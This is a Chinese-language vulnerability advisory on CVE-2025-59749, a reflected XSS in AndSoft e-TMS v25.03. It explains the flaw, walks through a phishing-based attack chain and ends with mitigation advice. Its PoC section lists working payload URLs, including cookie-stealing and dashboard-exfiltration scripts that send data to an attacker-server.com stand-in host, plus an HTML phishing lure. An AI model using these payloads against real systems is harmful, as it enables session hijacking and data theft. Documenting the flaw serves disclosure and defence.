CVE-2025-59749：AndSoft e-TMS 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-59749

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS v25.03

漏洞概述

CVE-2025-59749是AndSoft公司开发的e-TMS（Electronic Transport Management System，电子运输管理系统）v25.03版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞于2025年10月2日由西班牙国家网络安全研究所（INCIBE）披露，CVSS 3.1评分为6.1分，属于中危级别漏洞。

e-TMS是AndSoft公司开发的一款广泛应用于物流和运输行业的运输管理系统，主要用于管理订单、运输路线、车辆调度、货物跟踪等业务流程。由于该系统通常部署在企业内网或公网环境中，涉及大量业务数据和用户信息，因此其安全性至关重要。

该漏洞存在于系统的/clt/TRACK_REQUEST.ASP页面中，具体涉及参数名为'l'的查询参数。攻击者可以通过构造包含恶意JavaScript代码的特制URL，诱使受害者点击该链接。当受害者在浏览器中打开该恶意URL时，服务器会将未经过滤的用户输入直接反射回响应页面中，导致恶意脚本在受害者的浏览器上下文中执行。

由于该漏洞需要用户交互（UI:R）才能触发，且不需要任何认证（PR:N），攻击者可以通过钓鱼邮件、即时通讯消息或社交工程等方式传播恶意链接，窃取用户会话凭证、劫持账户权限、执行未授权操作，甚至进一步实施网络钓鱼攻击或部署恶意软件。漏洞的影响范围包括机密性低影响（C:L）和完整性低影响（I:L），但由于涉及企业核心业务系统，潜在风险不容忽视。

技术细节

该漏洞属于典型的反射型XSS漏洞，其根本原因在于e-TMS v25.03的/clt/TRACK_REQUEST.ASP页面在处理用户输入时，未对'l'参数进行充分的输入验证和输出编码。

漏洞原理：
1. e-TMS的TRACK_REQUEST.ASP页面用于处理货物跟踪请求，其中包含一个名为'l'的参数，用于指定跟踪请求的相关信息（如跟踪ID或查询条件）。
2. 当服务器接收到包含'l'参数的HTTP请求时，会将该参数的值直接嵌入到返回的HTML页面中，而没有进行HTML实体编码或过滤处理。
3. 攻击者可以在'l'参数中注入恶意的JavaScript代码（如<script>标签、事件处理器等），这些代码会被服务器原样返回并在受害者的浏览器中执行。

利用方式：
攻击者构造一个包含恶意JavaScript代码的URL，例如：
https://target-server/clt/TRACK_REQUEST.ASP?l=<script>alert(document.cookie)</script>

当受害者点击该链接时，浏览器会向目标服务器发送请求，服务器返回包含恶意脚本的页面，浏览器解析并执行该脚本。由于该脚本在目标域的上下文中执行，它可以访问该域下的cookies、session tokens等敏感信息，也可以修改页面内容、重定向用户到恶意网站，或者通过AJAX请求以受害者身份执行操作。

由于该漏洞的CVSS向量为AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N，表明攻击通过网络即可发起，攻击复杂度低，无需认证即可利用，但需要用户交互（如点击恶意链接），且影响范围为改变型（Scope Changed），意味着漏洞的影响超出了受影响组件本身。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎、Shodan等工具发现暴露在公网上的AndSoft e-TMS v25.03实例，确定目标系统的URL和可访问的端点。

STEP 2

步骤2：漏洞探测

攻击者访问目标系统的/clt/TRACK_REQUEST.ASP页面，识别出'l'参数的存在，并通过注入测试payload（如<script>alert(1)</script>）确认XSS漏洞的存在。

STEP 3

步骤3：构造恶意URL

攻击者构造包含恶意JavaScript代码的特制URL，将窃取cookies、会话令牌或执行其他恶意操作的代码嵌入到'l'参数中。

STEP 4

步骤4：投递恶意链接

攻击者通过钓鱼邮件、即时通讯工具、社交媒体或论坛等方式，将恶意URL发送给目标用户，利用社会工程学诱骗用户点击。

STEP 5

步骤5：触发漏洞

受害者点击恶意链接后，浏览器向目标服务器发送请求，服务器返回包含未过滤恶意脚本的页面，浏览器解析并执行该脚本。

STEP 6

步骤6：数据窃取与权限劫持

恶意脚本在受害者的浏览器上下文中执行，窃取会话cookies、令牌等敏感信息，攻击者利用这些信息劫持受害者的会话，执行未授权操作。

STEP 7

步骤7：进一步攻击

攻击者利用劫持的会话权限，在e-TMS系统中执行恶意操作，如篡改运输数据、窃取客户信息、进行金融欺诈等。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-59749 PoC - Reflected XSS in AndSoft e-TMS v25.03 -->
<!-- Vulnerable parameter: 'l' in /clt/TRACK_REQUEST.ASP -->
<!-- Usage: Send the crafted URL to the victim via phishing email, IM, etc. -->

<!-- Basic PoC URL -->
https://target-server/clt/TRACK_REQUEST.ASP?l=<script>alert('XSS')</script>

<!-- Cookie stealing PoC URL -->
https://target-server/clt/TRACK_REQUEST.ASP?l=<script>document.location='https://attacker-server.com/steal.php?cookie='+document.cookie</script>

<!-- Session hijacking PoC URL -->
https://target-server/clt/TRACK_REQUEST.ASP?l=<script>var x=new XMLHttpRequest();x.open('GET','/clt/Dashboard.ASP',true);x.onload=function(){document.location='https://attacker-server.com/exfil?data='+btoa(x.responseText)};x.send();</script>

<!-- HTML PoC page to demonstrate the vulnerability -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-59749 PoC</title>
</head>
<body>
    <h1>CVE-2025-59749 - Reflected XSS in AndSoft e-TMS</h1>
    <p>Click the link below to trigger the vulnerability:</p>
    <a href="https://target-server/clt/TRACK_REQUEST.ASP?l=<script>alert(document.cookie)</script>">
        Click here to track your shipment
    </a>
    <!-- Alternative payloads using event handlers -->
    <a href="https://target-server/clt/TRACK_REQUEST.ASP?l=valid_value" onmouseover="alert('XSS')">
        Hover here
    </a>
</body>
</html>

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）部署Web应用防火墙（WAF），配置规则阻止常见的XSS攻击payload；2）实施Content Security Policy（CSP）头，限制页面中可执行的脚本来源；3）为所有会话cookies添加HttpOnly标志，防止恶意脚本窃取会话信息；4）限制/clt/TRACK_REQUEST.ASP页面的访问，仅允许可信网络或VPN访问；5）对用户进行安全意识培训，警告用户不要点击可疑链接；6）监控Web服务器日志，及时发现和响应可疑的XSS攻击尝试；7）考虑使用URL重写或参数混淆技术，降低漏洞被利用的风险。